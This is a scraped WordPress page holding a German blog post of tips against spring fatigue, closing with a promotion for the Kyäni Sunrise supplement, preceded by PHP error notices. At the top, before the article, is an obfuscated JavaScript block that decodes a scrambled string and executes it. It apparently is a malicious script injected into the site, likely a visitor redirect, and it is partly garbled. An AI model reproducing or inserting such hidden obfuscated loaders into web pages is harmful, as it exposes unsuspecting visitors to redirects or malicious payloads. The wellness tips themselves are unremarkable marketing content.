var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();
Notice: Trying to access array offset on value of type null in /bitnami/wordpress/wp-content/plugins/sitepress-multilingual-cms/classes/plugins/wpml-plugins-check.php on line 18

Notice: Trying to access array offset on value of type null in /bitnami/wordpress/wp-content/plugins/sitepress-multilingual-cms/classes/plugins/wpml-plugins-check.php on line 22

Notice: Fehler beim Dekodieren einer JSON-Datei unter /opt/bitnami/wordpress/wp-includes/theme.json: Syntax error in /opt/bitnami/wordpress/wp-includes/functions.php on line 4578

Notice: Fehler beim Dekodieren einer JSON-Datei unter /opt/bitnami/wordpress/wp-includes/theme-i18n.json: Syntax error in /opt/bitnami/wordpress/wp-includes/functions.php on line 4578

Notice: Fehler beim Dekodieren einer JSON-Datei unter /opt/bitnami/wordpress/wp-includes/theme.json: Syntax error in /opt/bitnami/wordpress/wp-includes/functions.php on line 4578
TIPPS GEGEN FRÜHJAHRSMÜDIGKEIT - Austria

TIPPS GEGEN FRÜHJAHRSMÜDIGKEIT


Der Frühling ist endlich da! Die Blumen blühen, die Märkte sind voll mit farbenfrohem Saisongemüse und köstlichem Obst. Die Sonne scheint und geht später unter, was uns alle glücklicher macht und ein bisschen besser werden lässt!

Doch mit dem Frühling steht auch die Frühjahrsmüdigkeit vor der Tür. Aber worum handelt es sich genau bei der Frühjahrsmüdigkeit?
Im Prinzip wacht unser Körper nach der Winterzeit auf und stellt sich der neuen Jahreszeit. Der erhöhte Energiebedarf an den längeren Frühlingstagen kann die Kapazität unseres Körpers übersteigen, mit dieser Veränderung umzugehen. Wir fühlen uns also grundsätzlich müder und gestresster.

Aber keine Sorge – das lässt sich mit den folgenden Tricks und Tipps leicht umgehen:

1: Senke dein Stressniveau durch das Einführen täglicher und wöchentlicher Routinen. Lege außerdem tägliche reguläre Pausen ein, um Körper und Geist ausruhen zu lassen.

2: Steigere dein Energieniveau, indem du viel Wasser trinkst. Unterstütze dein Immunsystem durch eine ausgewogene Ernährung und den Verzehr kleiner Mengen nahrhafter, eiweißreicher Lebensmittel. Probiere mit ihnen neue Rezepte aus. Der Fantasie sind keine Grenzen gesetzt!

3: Mache Nickerchen und konzentriere dich auf einen guten Schlaf! Versuche, 8 Stunden pro Tag zu schlafen, und vermeide es, vor dem Schlafengehen auf dein Handy zu schauen. Sorge für eine angenehme und gleichmäßige Schlafumgebung

4: Unterstütze deine emotionale Stabilität mit einem schönen Meditations– oder Entspannungsprogramm. Finde viele davon kostenlos im Internet und mache es zu einer sozialen Aktivität mit deinen Freunden!

5: Dusche kalt! Es erfrischt und steigert deine Stimmung und Energie und kurbelt deinen Kreislauf aus! Auch deine Haut wird dir hierfür sehr dankbar sein!

6: Gehe an die frische Luft und bewege dich. Auch Vitamin D wird bei diesen Übungen deine Freude zusätzlich steigern. Suche nach einer tollen motivierenden Playlist, damit es noch mehr Spaß macht! Wenn du nicht gerne joggst oder läufst, tut es auch ein einfacher Spaziergang. Vergiss nicht, dich tagsüber zu dehnen, wenn es nötig ist.

7: Es gibt nichts Besseres als einen schönen Frühlingsspaziergang in der Natur! Genieße die Blüte und erlebe sie mit eigenen Augen! Der Frühling ist auch ideal für ein frühes Picknick – vergiss nicht, deine bevorzugten Frühlingsleckereien oder deine Bücher mitzunehmen!

8: Halte dein Zuhause sauber – Trenne dich von Dingen, die du nicht mehr brauchst, und mache einen gründlichen Frühjahrsputz bei dir zu Hause! Ein wunderbarer Lebensraum wird sich so erfrischend und belebend anfühlen! Kaufe auch ein paar schöne Blumen. Sie werden eine lebendige Umgebung schaffen!



Beginne noch HEUTE, diese Tipps umzusetzen, und bekämpfe die Frühjahrsmüdigkeit mit Hilfe des folgenden Produkts von Kyäni:

Kyäni Sunrise: Neben vielen anderen erstaunlichen Inhaltsstoffen bekämpfen Riboflavin, Cobalamin (Vitamin B12) und Panax Ginseng die Müdigkeit*! Die beste Art, es als Teil von Triangle of Wellness zu nutzen!

Stelle sicher, ausreichend Triangle of Wellness für den Frühling zu haben! Wenn du deine Vorräte aufstocken musst, gehe in den Shop, um für Nachschub zu sorgen!


*https://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX%3A02012R0432-20210517

This site is registered on wpml.org as a development site.